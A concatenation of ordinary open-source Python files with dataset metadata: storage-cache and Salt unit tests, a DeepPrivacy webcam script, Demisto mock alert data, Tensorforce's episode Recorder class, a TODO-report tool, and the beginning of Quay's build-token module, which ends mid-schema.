Python
| false
| false
| 3,521
|
py
|
test_io_flags.py
|
#
# Copyright(c) 2020-2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#
from ctypes import c_int, memmove, cast, c_void_p
from enum import IntEnum
from itertools import product
import random
import pytest
from pyocf.types.cache import Cache, CacheMode
from pyocf.types.core import Core
from pyocf.types.volume import RamVolume
from pyocf.types.volume_core import CoreVolume
from pyocf.types.data import Data
from pyocf.types.io import IoDir
from pyocf.utils import Size
from pyocf.types.shared import OcfCompletion
def __io(io, queue, address, size, data, direction):
io.set_data(data, 0)
completion = OcfCompletion([("err", c_int)])
io.callback = completion.callback
io.submit()
completion.wait()
return int(completion.results["err"])
def io_to_exp_obj(vol, address, size, data, offset, direction, flags):
queue = vol.parent.get_default_queue()
vol.open()
io = vol.new_io(queue, address, size, direction, 0, flags)
if direction == IoDir.READ:
_data = Data.from_bytes(bytes(size))
else:
_data = Data.from_bytes(data, offset, size)
ret = __io(io, queue, address, size, _data, direction)
if not ret and direction == IoDir.READ:
memmove(cast(data, c_void_p).value + offset, _data.handle, size)
vol.close()
return ret
class FlagsValVolume(RamVolume):
def __init__(self, size, flags):
self.flags = flags
self.check = False
self.fail = False
super().__init__(size)
def set_check(self, check):
self.check = check
def submit_io(self, io):
if self.check:
flags = io.contents._flags
if flags != self.flags:
self.fail = True
super().submit_io(io)
@pytest.mark.parametrize("cache_mode", CacheMode)
def test_io_flags(pyocf_ctx, cache_mode):
"""
Verify that I/O flags provided at the top volume interface
are propagated down to bottom volumes for all associated
I/Os (including metadata writes to cache volume).
"""
flags = 0x239482
block_size = 4096
data = bytes(block_size)
pyocf_ctx.register_volume_type(FlagsValVolume)
cache_device = FlagsValVolume(Size.from_MiB(50), flags)
core_device = FlagsValVolume(Size.from_MiB(50), flags)
cache = Cache.start_on_device(cache_device, cache_mode=cache_mode)
core = Core.using_device(core_device)
cache.add_core(core)
vol = CoreVolume(core)
cache_device.set_check(True)
core_device.set_check(True)
# write miss
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
# read miss
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "dirty" read hit
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "clean" read hit
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.READ, flags)
assert not cache_device.fail
assert not core_device.fail
# "dirty" write hit
io_to_exp_obj(vol, block_size * 0, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
# "clean" write hit
io_to_exp_obj(vol, block_size * 1, block_size, data, 0, IoDir.WRITE, flags)
assert not cache_device.fail
assert not core_device.fail
|
05f72ea15b6d788ee370ea8aea6e39b62d4063b6
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/pytests/unit/states/test_influxdb08_database.py
|
d5685de213120132f386a64ffe4fb38dcaf7988a
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 3,027
|
py
|
test_influxdb08_database.py
|
"""
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
"""
import pytest
import salt.states.influxdb08_database as influxdb08_database
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {influxdb08_database: {}}
def test_present():
"""
Test to ensure that the named database is present.
"""
name = "salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(side_effect=[False, False, False, True])
mock_t = MagicMock(side_effect=[True, False])
with patch.dict(
influxdb08_database.__salt__,
{"influxdb08.db_exists": mock, "influxdb08.db_create": mock_t},
):
with patch.dict(influxdb08_database.__opts__, {"test": True}):
comt = "Database {} is absent and needs to be created".format(name)
ret.update({"comment": comt})
assert influxdb08_database.present(name) == ret
with patch.dict(influxdb08_database.__opts__, {"test": False}):
comt = "Database {} has been created".format(name)
ret.update(
{"comment": comt, "result": True, "changes": {"salt": "Present"}}
)
assert influxdb08_database.present(name) == ret
comt = "Failed to create database {}".format(name)
ret.update({"comment": comt, "result": False, "changes": {}})
assert influxdb08_database.present(name) == ret
comt = "Database {} is already present, so cannot be created".format(name)
ret.update({"comment": comt, "result": True})
assert influxdb08_database.present(name) == ret
def test_absent():
"""
Test to ensure that the named database is absent.
"""
name = "salt"
ret = {"name": name, "result": None, "comment": "", "changes": {}}
mock = MagicMock(side_effect=[True, True, True, False])
mock_t = MagicMock(side_effect=[True, False])
with patch.dict(
influxdb08_database.__salt__,
{"influxdb08.db_exists": mock, "influxdb08.db_remove": mock_t},
):
with patch.dict(influxdb08_database.__opts__, {"test": True}):
comt = "Database {} is present and needs to be removed".format(name)
ret.update({"comment": comt})
assert influxdb08_database.absent(name) == ret
with patch.dict(influxdb08_database.__opts__, {"test": False}):
comt = "Database {} has been removed".format(name)
ret.update({"comment": comt, "result": True, "changes": {"salt": "Absent"}})
assert influxdb08_database.absent(name) == ret
comt = "Failed to remove database {}".format(name)
ret.update({"comment": comt, "result": False, "changes": {}})
assert influxdb08_database.absent(name) == ret
comt = "Database {} is not present, so it cannot be removed".format(name)
ret.update({"comment": comt, "result": True})
assert influxdb08_database.absent(name) == ret
|
e9b7caef9c51abd6afff62a998413f2976f899ac
|
6b551bec528a1d6544201d3c6d86835e885343b5
|
/webcam.py
|
2b054228809803eeda08af1bb588d09de5df9771
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
hukkelas/DeepPrivacy
|
9471c8e9389828aa09330905081205b061161d81
|
5ee3f1b0608f03ac54d5694b6421f6132cb63f0e
|
refs/heads/master
| 2023-08-16T00:41:02.366235
| 2023-03-28T06:23:34
| 2023-03-28T06:23:34
| 206,106,232
| 1,288
| 194
|
MIT
| 2021-08-18T08:21:33
| 2019-09-03T15:08:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,732
|
py
|
webcam.py
|
import cv2
import time
import numpy as np
import torch
from deep_privacy import cli
from deep_privacy.visualization import utils as vis_utils
from deep_privacy.utils import BufferlessVideoCapture
from deep_privacy.build import build_anonymizer
import os
# Configs
torch.backends.cudnn.benchmark = False
parser = cli.get_parser()
parser.add_argument("--debug", default=False, action="store_true")
parser.add_argument("-f", "--file", default=None)
args = parser.parse_args()
anonymizer, cfg = build_anonymizer(
args.model, opts=args.opts, config_path=args.config_path,
return_cfg=True)
if args.debug:
anonymizer.save_debug = True
width = 1280
height = 720
if args.file is not None:
assert os.path.isfile(args.file)
cap = cv2.VideoCapture(args.file)
else:
cap = BufferlessVideoCapture(0)
frames = 0
WARMUP = True
t = time.time()
while True:
# Capture frame-by-frame
ret, frame = cap.read()
frame = cv2.resize(frame, (width, height))
frame = frame[:, :, ::-1]
frame = anonymizer.detect_and_anonymize_images([frame])[0]
frame = frame[:, :, ::-1]
# Display the resulting frame
if WARMUP and frames > 30:
WARMUP = False
t = time.time()
frames = 0
frames += 1
delta = time.time() - t
fps = "?"
if delta > 1e-6:
fps = frames / delta
print(f"FPS: {delta:.3f}", end="\r")
if args.debug:
debug_im = cv2.imread(".debug/inference/im0_face0.png")
debug_im = vis_utils.pad_im_as(debug_im, frame)
frame = np.concatenate((frame, debug_im))
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
|
d72448376c052f0258db792fa11c682b7776216e
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/ZeroTrustAnalyticsPlatform/Integrations/ZeroTrustAnalyticsPlatform/test_data/api_data.py
|
5e9944225ee0b0d1a56096ab8c903bf8bd59387d
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
api_data.py
|
def alert_data():
return [
{
"datetime_created": "2021-05-11T20:11:31Z",
"datetime_closed": None,
"datetime_firstevent": "2021-05-11T20:11:30Z",
"datetime_events_added": "2021-05-11T20:11:31Z",
"datetime_org_assigned": "2021-05-11T20:11:31Z",
"id": 1,
"status": "assigned",
"description": "Test Alert 1",
"url": "http://some_mock_url/#/incidents/1",
},
{
"datetime_created": "2021-05-11T20:09:50Z",
"datetime_closed": None,
"datetime_firstevent": "2021-05-11T20:09:48Z",
"datetime_events_added": "2021-05-11T20:09:50Z",
"datetime_org_assigned": "2021-05-11T20:09:50Z",
"id": 2,
"status": "assigned",
"description": "Test Alert 2",
"url": "http://some_mock_url/#/incidents/2",
},
]
def escalation_path_data():
return [
{
"time": "2021-05-11T20:11:31Z",
"group": "Default (dummy_org)",
"group_id": "1",
"type": "Group",
},
]
def event_data():
return [
{
"ata_event_count": 1,
"datetime_created": "2021-05-11T20:11:30Z",
"fields": [
{"key": "auto_run", "label": "Auto Run", "value": "False", "order": 0},
{
"key": "event_name",
"label": "Event Name",
"value": "threat_quarantined",
"order": 1,
},
{
"key": "event_timestamp",
"label": "Event Timestamp",
"value": "2021-05-11T20:11:30.728667",
"order": 2,
},
],
"trigger": True,
},
]
def comment_data():
return [
{
"comment": "Test comment",
"datetime_created": "2021-05-10T19:36:48Z",
"id": 1,
"user": user_data(),
},
{
"comment": "Closing alert due to duplicate.",
"datetime_created": "2021-05-10T19:50:18Z",
"id": 2,
"user": user_data(),
},
]
def organization_data():
return [
{
"id": 2,
"psa_id": "dummy_id",
"name": "dummy_org",
"monitoring_organization": {
"id": 1,
"psa_id": "csmssp",
"name": "Critical Start MDR",
},
},
{
"id": 3,
"psa_id": "child_org_id",
"name": "child_org",
"monitoring_organization": {
"id": 1,
"psa_id": "dummy_id",
"name": "Critical Start MDR",
},
},
]
def group_data():
return [
{
"id": 1,
"name": "Different Group",
"organization": {"id": 1, "name": "dummy_org"},
},
{
"id": 2,
"name": "Default",
"organization": {"id": 1, "name": "dummy_org"},
},
]
def user_data():
return {
"id": 1,
"name": "Active User",
"email": "test@test",
"organization": {"id": 1, "name": "dummy_org", "psa_id": "dummy_id"},
}
|
0b759320031ffb7d4ea33623383f3488864125ae
|
64d923ab490341af97c4e7f6d91bf0e6ccefdf4b
|
/tensorforce/agents/recorder.py
|
eb255f8fa9e95467ba57e9d7dfba98a2660617eb
|
[
"Apache-2.0"
] |
permissive
|
tensorforce/tensorforce
|
38d458fedeeaa481adf083397829cea434d020cd
|
1bf4c3abb471062fb66f9fe52852437756fd527b
|
refs/heads/master
| 2023-08-17T17:35:34.578444
| 2023-08-14T20:14:08
| 2023-08-14T20:14:08
| 85,491,050
| 1,312
| 246
|
Apache-2.0
| 2023-08-14T20:14:10
| 2017-03-19T16:24:22
|
Python
|
UTF-8
|
Python
| false
| false
| 24,304
|
py
|
recorder.py
|
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from collections import OrderedDict
import numpy as np
from tensorforce import TensorforceError, util
from tensorforce.core import ArrayDict, ListDict, TensorSpec, TensorsSpec
class Recorder(object):
"""
Recorder wrapper (specification key: `recorder`).
Args:
fn_act (callable[states -> actions]): Act-function mapping states to actions which is
supposed to be recorded.
"""
def __init__(
self, fn_act, states, actions, max_episode_timesteps=None, parallel_interactions=1,
recorder=None
):
self.is_initialized = False
# fn_act=None means Agent
if fn_act is None:
from tensorforce import Agent
assert isinstance(self, Agent)
self._is_agent = True
else:
self._is_agent = False
self.fn_act = fn_act
# States/actions, plus single state/action flag
if 'type' in states or 'shape' in states:
self.states_spec = TensorsSpec(singleton=states)
else:
self.states_spec = TensorsSpec(states)
if 'type' in actions or 'shape' in actions:
self.actions_spec = TensorsSpec(singleton=actions)
else:
self.actions_spec = TensorsSpec(actions)
# Max episode timesteps
if max_episode_timesteps is None:
self.max_episode_timesteps = None
else:
self.max_episode_timesteps = int(max_episode_timesteps)
# Parallel interactions
if isinstance(parallel_interactions, int):
if parallel_interactions <= 0:
raise TensorforceError.value(
name='Agent', argument='parallel_interactions', value=parallel_interactions,
hint='<= 0'
)
self.parallel_interactions = parallel_interactions
else:
raise TensorforceError.type(
name='Agent', argument='parallel_interactions', dtype=type(parallel_interactions)
)
# Other specifications
self.internals_spec = TensorsSpec()
self.terminal_spec = TensorSpec(type=int, shape=(), num_values=3)
self.reward_spec = TensorSpec(type=float, shape=())
self.parallel_spec = TensorSpec(type=int, shape=(), num_values=self.parallel_interactions)
# Recorder
if isinstance(recorder, str):
recorder = dict(directory=recorder)
if recorder is None:
pass
elif not all(key in ('directory', 'frequency', 'max-traces', 'start') for key in recorder):
raise TensorforceError.value(
name='Agent', argument='recorder values', value=list(recorder),
hint='not from {directory,frequency,max-traces,start}'
)
self.recorder = recorder if recorder is None else dict(recorder)
def initialize(self):
# Check whether already initialized
if self.is_initialized:
raise TensorforceError(
message="Agent is already initialized, possibly as part of Agent.create()."
)
self.is_initialized = True
# Act-observe timestep check
self.timestep_counter = np.zeros(
shape=(self.parallel_interactions,), dtype=util.np_dtype(dtype='int')
)
self.timestep_completed = np.ones(
shape=(self.parallel_interactions,), dtype=util.np_dtype(dtype='bool')
)
# Recorder buffers if required
if self.recorder is not None:
self.num_episodes = 0
self.buffers = ListDict()
self.buffers['terminal'] = [list() for _ in range(self.parallel_interactions)]
self.buffers['reward'] = [list() for _ in range(self.parallel_interactions)]
def function(spec):
return [list() for _ in range(self.parallel_interactions)]
self.buffers['states'] = self.states_spec.fmap(function=function, cls=ListDict)
self.buffers['actions'] = self.actions_spec.fmap(function=function, cls=ListDict)
function = (lambda x: list())
self.recorded = ListDict()
self.recorded['states'] = self.states_spec.fmap(function=function, cls=ListDict)
self.recorded['actions'] = self.actions_spec.fmap(function=function, cls=ListDict)
self.recorded['terminal'] = list()
self.recorded['reward'] = list()
def close(self):
pass
def reset(self):
# Reset timestep check
self.timestep_counter[:] = 0
self.timestep_completed[:] = True
# Reset buffers
if self.recorder is not None:
for buffer in self.buffers.values():
for x in buffer:
x.clear()
if self.recorder is not None:
for x in self.recorded.values():
x.clear()
def initial_internals(self):
return OrderedDict()
def act(
self, states, internals=None, parallel=0, independent=False, deterministic=True, **kwargs
):
# Independent and internals
is_internals_none = (internals is None)
if independent:
if parallel != 0:
raise TensorforceError.invalid(
name='Agent.act', argument='parallel', condition='independent is true'
)
if is_internals_none and len(self.internals_spec) > 0:
raise TensorforceError.required(
name='Agent.act', argument='internals', condition='independent is true'
)
else:
if not is_internals_none:
raise TensorforceError.invalid(
name='Agent.act', argument='internals', condition='independent is false'
)
# Process states input and infer batching structure
states, batched, num_parallel, is_iter_of_dicts = self._process_states_input(
states=states, function_name='Agent.act'
)
if independent:
# Independent mode: handle internals argument
if is_internals_none:
# Default input internals=None
pass
elif is_iter_of_dicts or isinstance(internals, (tuple, list)):
# Input structure iter[dict[internal]]
if not isinstance(internals, (tuple, list)):
raise TensorforceError.type(
name='Agent.act', argument='internals', dtype=type(internals),
hint='is not tuple/list'
)
internals = [ArrayDict(internal) for internal in internals]
internals = internals[0].fmap(
function=(lambda *xs: np.stack(xs, axis=0)), zip_values=internals[1:]
)
else:
# Input structure dict[iter[internal]]
if not isinstance(internals, dict):
raise TensorforceError.type(
name='Agent.act', argument='internals', dtype=type(internals),
hint='is not dict'
)
internals = ArrayDict(internals)
if not independent or not is_internals_none:
# Expand inputs if not batched
if not batched:
internals = internals.fmap(function=(lambda x: np.expand_dims(x, axis=0)))
# Check number of inputs
for name, internal in internals.items():
if internal.shape[0] != num_parallel:
raise TensorforceError.value(
name='Agent.act', argument='len(internals[{}])'.format(name),
value=internal.shape[0], hint='!= len(states)'
)
else:
# Non-independent mode: handle parallel input
if batched:
# Batched input
parallel = np.asarray(parallel)
elif parallel == 0:
# Default input parallel=0
if batched:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray([parallel])
else:
# Expand input if not batched
parallel = np.asarray([parallel])
# Check number of inputs
if parallel.shape[0] != num_parallel:
raise TensorforceError.value(
name='Agent.act', argument='len(parallel)', value=len(parallel),
hint='!= len(states)'
)
# If not independent, check whether previous timesteps were completed
if not independent:
if not self.timestep_completed[parallel].all():
raise TensorforceError(
message="Calling agent.act must be preceded by agent.observe for training, or "
"agent.act argument 'independent' must be passed as True."
)
self.timestep_completed[parallel] = False
# Buffer inputs for recording
if self.recorder is not None and not independent and \
self.num_episodes >= self.recorder.get('start', 0):
for n in range(num_parallel):
for name in self.states_spec:
self.buffers['states'][name][parallel[n]].append(states[name][n])
# fn_act()
if self._is_agent:
actions, internals = self.fn_act(
states=states, internals=internals, parallel=parallel, independent=independent,
deterministic=deterministic, is_internals_none=is_internals_none,
num_parallel=num_parallel
)
else:
if batched:
assert False
else:
states = states.fmap(function=(lambda x: x[0].item() if x.shape == (1,) else x[0]))
actions = self.fn_act(states.to_kwargs())
if self.actions_spec.is_singleton():
actions = ArrayDict(singleton=np.asarray([actions]))
else:
actions = ArrayDict(actions)
actions = actions.fmap(function=(lambda x: np.asarray([x])))
# Buffer outputs for recording
if self.recorder is not None and not independent and \
self.num_episodes >= self.recorder.get('start', 0):
for n in range(num_parallel):
for name in self.actions_spec:
self.buffers['actions'][name][parallel[n]].append(actions[name][n])
# Unbatch actions
if batched:
# If inputs were batched, turn dict of lists into list of dicts
function = (lambda x: x.item() if x.shape == () else x)
# TODO: recursive
if self.actions_spec.is_singleton():
actions = actions.singleton()
if is_iter_of_dicts:
actions = [function(actions[n]) for n in range(num_parallel)]
else:
if is_iter_of_dicts:
actions = [
OrderedDict(((name, function(x[n])) for name, x in actions.items()))
for n in range(num_parallel)
]
else:
actions = OrderedDict(actions.items())
if independent and not is_internals_none:
if is_iter_of_dicts:
# TODO: recursive
internals = [
OrderedDict(((name, function(x[n])) for name, x in internals.items()))
for n in range(num_parallel)
]
else:
internals = OrderedDict(internals.items())
else:
# If inputs were not batched, unbatch outputs
function = (lambda x: x.item() if x.shape == (1,) else x[0])
if self.actions_spec.is_singleton():
actions = function(actions.singleton())
else:
actions = actions.fmap(function=function, cls=OrderedDict)
if independent and not is_internals_none:
internals = internals.fmap(function=function, cls=OrderedDict)
if independent and not is_internals_none:
return actions, internals
else:
return actions
def observe(self, reward=0.0, terminal=False, parallel=0):
# Check whether inputs are batched
if util.is_iterable(x=reward) or (isinstance(reward, np.ndarray) and reward.ndim > 0):
reward = np.asarray(reward)
num_parallel = reward.shape[0]
if not isinstance(terminal, np.ndarray) and terminal is False:
terminal = np.asarray([0 for _ in range(num_parallel)])
else:
terminal = np.asarray(terminal)
if not isinstance(parallel, np.ndarray) and parallel == 0:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray(parallel)
elif util.is_iterable(x=terminal) or \
(isinstance(terminal, np.ndarray) and terminal.ndim > 0):
terminal = np.asarray(terminal, dtype=util.np_dtype(dtype='int'))
num_parallel = terminal.shape[0]
if not isinstance(reward, np.ndarray) and reward == 0.0:
reward = np.asarray([0.0 for _ in range(num_parallel)])
else:
reward = np.asarray(reward)
if not isinstance(parallel, np.ndarray) and parallel == 0:
assert num_parallel == self.parallel_interactions
parallel = np.asarray(list(range(num_parallel)))
else:
parallel = np.asarray(parallel)
elif util.is_iterable(x=parallel) or \
(isinstance(parallel, np.ndarray) and parallel.ndim > 0):
parallel = np.asarray(parallel)
num_parallel = parallel.shape[0]
if not isinstance(reward, np.ndarray) and reward == 0.0:
reward = np.asarray([0.0 for _ in range(num_parallel)])
else:
reward = np.asarray(reward)
if not isinstance(terminal, np.ndarray) and terminal is False:
terminal = np.asarray([0 for _ in range(num_parallel)])
else:
terminal = np.asarray(terminal)
else:
reward = np.asarray([float(reward)])
terminal = np.asarray([int(terminal)])
parallel = np.asarray([int(parallel)])
num_parallel = 1
# Check whether shapes/lengths are consistent
if parallel.shape[0] == 0:
raise TensorforceError.value(
name='Agent.observe', argument='len(parallel)', value=parallel.shape[0], hint='= 0'
)
if reward.shape != parallel.shape:
raise TensorforceError.value(
name='Agent.observe', argument='len(reward)', value=reward.shape,
hint='!= parallel length'
)
if terminal.shape != parallel.shape:
raise TensorforceError.value(
name='Agent.observe', argument='len(terminal)', value=terminal.shape,
hint='!= parallel length'
)
# Convert terminal to int if necessary
if terminal.dtype is util.np_dtype(dtype='bool'):
zeros = np.zeros_like(terminal, dtype=util.np_dtype(dtype='int'))
ones = np.ones_like(terminal, dtype=util.np_dtype(dtype='int'))
terminal = np.where(terminal, ones, zeros)
# Check whether current timesteps are not completed
if self.timestep_completed[parallel].any():
raise TensorforceError(message="Calling agent.observe must be preceded by agent.act.")
self.timestep_completed[parallel] = True
# Check whether episode is too long
self.timestep_counter[parallel] += 1
if self.max_episode_timesteps is not None and np.logical_and(
terminal == 0, self.timestep_counter[parallel] > self.max_episode_timesteps
).any():
raise TensorforceError(message="Episode longer than max_episode_timesteps.")
self.timestep_counter[parallel] = np.where(terminal > 0, 0, self.timestep_counter[parallel])
if self.recorder is None:
pass
elif self.num_episodes < self.recorder.get('start', 0):
# Increment num_episodes
for t in terminal.tolist():
if t > 0:
self.num_episodes += 1
else:
# Store values per parallel interaction
for p, t, r in zip(parallel.tolist(), terminal.tolist(), reward.tolist()):
# Buffer inputs
self.buffers['terminal'][p].append(t)
self.buffers['reward'][p].append(r)
# Continue if not terminal
if t == 0:
continue
self.num_episodes += 1
# Buffered terminal/reward inputs
for name in self.states_spec:
self.recorded['states'][name].append(
np.stack(self.buffers['states'][name][p], axis=0)
)
self.buffers['states'][name][p].clear()
for name, spec in self.actions_spec.items():
self.recorded['actions'][name].append(
np.stack(self.buffers['actions'][name][p], axis=0)
)
self.buffers['actions'][name][p].clear()
self.recorded['terminal'].append(
np.array(self.buffers['terminal'][p], dtype=self.terminal_spec.np_type())
)
self.buffers['terminal'][p].clear()
self.recorded['reward'].append(
np.array(self.buffers['reward'][p], dtype=self.reward_spec.np_type())
)
self.buffers['reward'][p].clear()
# Check whether recording step
if (self.num_episodes - self.recorder.get('start', 0)) \
% self.recorder.get('frequency', 1) != 0:
continue
# Manage recorder directory
directory = self.recorder['directory']
if os.path.isdir(directory):
files = sorted(
f for f in os.listdir(directory)
if os.path.isfile(os.path.join(directory, f))
and os.path.splitext(f)[1] == '.npz'
)
else:
os.makedirs(directory)
files = list()
max_traces = self.recorder.get('max-traces')
if max_traces is not None and len(files) > max_traces - 1:
for filename in files[:-max_traces + 1]:
filename = os.path.join(directory, filename)
os.remove(filename)
# Write recording file
filename = os.path.join(directory, 'trace-{:09d}.npz'.format(self.num_episodes - 1))
# time.strftime('%Y%m%d-%H%M%S')
kwargs = self.recorded.fmap(function=np.concatenate, cls=ArrayDict).items()
np.savez_compressed(file=filename, **dict(kwargs))
# Clear recorded values
for recorded in self.recorded.values():
recorded.clear()
if self._is_agent:
return reward, terminal, parallel
else:
return 0
def _process_states_input(self, states, function_name):
if self.states_spec.is_singleton() and not isinstance(states, dict) and not (
util.is_iterable(x=states) and isinstance(states[0], dict)
):
# Single state
states = np.asarray(states)
if states.shape == self.states_spec.value().shape:
# Single state is not batched
states = ArrayDict(singleton=np.expand_dims(states, axis=0))
batched = False
num_instances = 1
is_iter_of_dicts = None
else:
# Single state is batched, iter[state]
assert states.shape[1:] == self.states_spec.value().shape
assert type(states) in (tuple, list, np.ndarray)
num_instances = states.shape[0]
states = ArrayDict(singleton=states)
batched = True
is_iter_of_dicts = True # Default
elif util.is_iterable(x=states):
# States is batched, iter[dict[state]]
batched = True
num_instances = len(states)
is_iter_of_dicts = True
assert type(states) in (tuple, list)
if num_instances == 0:
raise TensorforceError.value(
name=function_name, argument='len(states)', value=num_instances, hint='= 0'
)
for n, state in enumerate(states):
if not isinstance(state, dict):
raise TensorforceError.type(
name=function_name, argument='states[{}]'.format(n), dtype=type(state),
hint='is not dict'
)
# Turn iter of dicts into dict of arrays
# (Doesn't use self.states_spec since states also contains auxiliaries)
states = [ArrayDict(state) for state in states]
states = states[0].fmap(
function=(lambda *xs: np.stack(xs, axis=0)), zip_values=states[1:]
)
elif isinstance(states, dict):
# States is dict, turn into arrays
states = ArrayDict(states)
name, spec = self.states_spec.item()
if name is None:
name = 'state'
if states[name].shape == spec.shape:
# States is not batched, dict[state]
states = states.fmap(function=(lambda state: np.expand_dims(state, axis=0)))
batched = False
num_instances = 1
is_iter_of_dicts = None
else:
# States is batched, dict[iter[state]]
assert states[name].shape[1:] == spec.shape
assert type(states[name]) in (tuple, list, np.ndarray)
batched = True
num_instances = states[name].shape[0]
is_iter_of_dicts = False
if num_instances == 0:
raise TensorforceError.value(
name=function_name, argument='len(states)', value=num_instances, hint='= 0'
)
else:
raise TensorforceError.type(
name=function_name, argument='states', dtype=type(states),
hint='is not array/tuple/list/dict'
)
# Check number of inputs
if any(state.shape[0] != num_instances for state in states.values()):
raise TensorforceError.value(
name=function_name, argument='len(states)',
value=[state.shape[0] for state in states.values()], hint='inconsistent'
)
return states, batched, num_instances, is_iter_of_dicts
|
257be356c7486df24bdcdf3eb9f3058c98b792ed
|
65c8f01506df85ffa42094c45a844d4262f398e2
|
/tools/todos.py
|
8d0c665409108afb7044e65bfb848c752696fc9d
|
[
"Apache-2.0"
] |
permissive
|
robocorp/rpaframework
|
da4b523c76f18967d7a267f571b8a64d661dc1c8
|
321efaa3bb85e8bf1a4be8e1f1720ad9230dd962
|
refs/heads/master
| 2023-09-05T20:25:53.305425
| 2023-09-04T16:49:28
| 2023-09-04T16:49:28
| 231,374,845
| 852
| 164
|
Apache-2.0
| 2023-09-14T09:11:30
| 2020-01-02T12:11:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,239
|
py
|
todos.py
|
#!/usr/bin/env python3
import argparse
import json
import os
import re
import sys
from collections import defaultdict
from contextlib import contextmanager
from io import StringIO
from pathlib import Path
from pylint.lint import Run
TODO_PATTERN = re.compile(r"(todo|fixme|xxx)[\:\.]?\s*(.+)", re.IGNORECASE)
@contextmanager
def redirect():
stdout = sys.stdout
sys.stdout = StringIO()
try:
yield sys.stdout
finally:
sys.stdout.close()
sys.stdout = stdout
def todo_msg(msg):
match = TODO_PATTERN.match(msg)
if match:
return match.group(2)
else:
return msg
def main():
parser = argparse.ArgumentParser(description="Write all todo items as rst")
parser.add_argument("input", help="Path to source files")
parser.add_argument("output", help="Path to output rst file")
args = parser.parse_args()
cmd = [
"pylint",
"--disable=all",
"--enable=fixme",
"--exit-zero",
"-f",
"json",
Path(args.input).name,
]
cwd = os.getcwd()
os.chdir(Path(args.input).parent)
try:
with redirect() as stdout:
Run(cmd, exit=False)
result = json.loads(stdout.getvalue())
finally:
os.chdir(cwd)
todos = defaultdict(list)
for item in result:
# Remove given search path from module path
name = ".".join(item["module"].split(".")[1:])
message = todo_msg(item["message"])
todos[name].append({"message": todo_msg(item["message"]), "line": item["line"]})
output = ["****", "TODO", "****", ""]
for module, items in sorted(todos.items()):
items.sort(key=lambda item: item["line"])
output.append(f"{module}:")
output.append("=" * (len(module) + 1))
output.append("")
output.append(".. csv-table::")
output.append(' :header: "Line", "Message"')
output.append(" :widths: 10, 40")
output.append("")
for item in items:
output.append(' "{line}", "{message}"'.format(**item))
output.append("")
with open(args.output, "w") as outfile:
outfile.write("\n".join(output))
if __name__ == "__main__":
main()
|
188c60d383655b241199d837a544c7f8f35b378d
|
52a677b94056d3397b4a499bc9185adb68a63f05
|
/buildman/build_token.py
|
2b3b3e0819681ae0c1da6dfd89cc124962e621a4
|
[
"Apache-2.0"
] |
permissive
|
quay/quay
|
9b6fcff54efc0dbf7c6d91fa80676950555b6f1a
|
e400a0c22c5f89dd35d571654b13d262b1f6e3b3
|
refs/heads/master
| 2023-08-28T15:08:38.001842
| 2023-08-28T13:52:31
| 2023-08-28T13:52:31
| 220,517,730
| 2,363
| 322
|
Apache-2.0
| 2023-09-14T17:43:48
| 2019-11-08T17:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 3,719
|
py
|
build_token.py
|
import logging
import jsonschema
import jwt
from app import instance_keys
from util.security import jwtutil
from util.security.registry_jwt import (
ALGORITHM,
JWT_CLOCK_SKEW_SECONDS,
InvalidBearerTokenException,
generate_bearer_token,
)
logger = logging.getLogger(__name__)
ANONYMOUS_SUB = "(anonymous)"
BUILD_JOB_REGISTRATION_TYPE = "build_job_registration"
BUILD_JOB_TOKEN_TYPE = "build_job_token"
BUILD_TOKEN_CONTEXT_SCHEMA = {
"type": "object",
"description": "Build context",
"required": ["token_type", "build_id", "job_id", "expiration"],
"properties": {
"token_type": {
"type": "string",
"description": "The build token type",
},
"build_id": {
"type": "string",
"description": "The build id",
},
"job_id": {
"type": "string",
"description": "The job id",
},
"expiration": {
"type": "number",
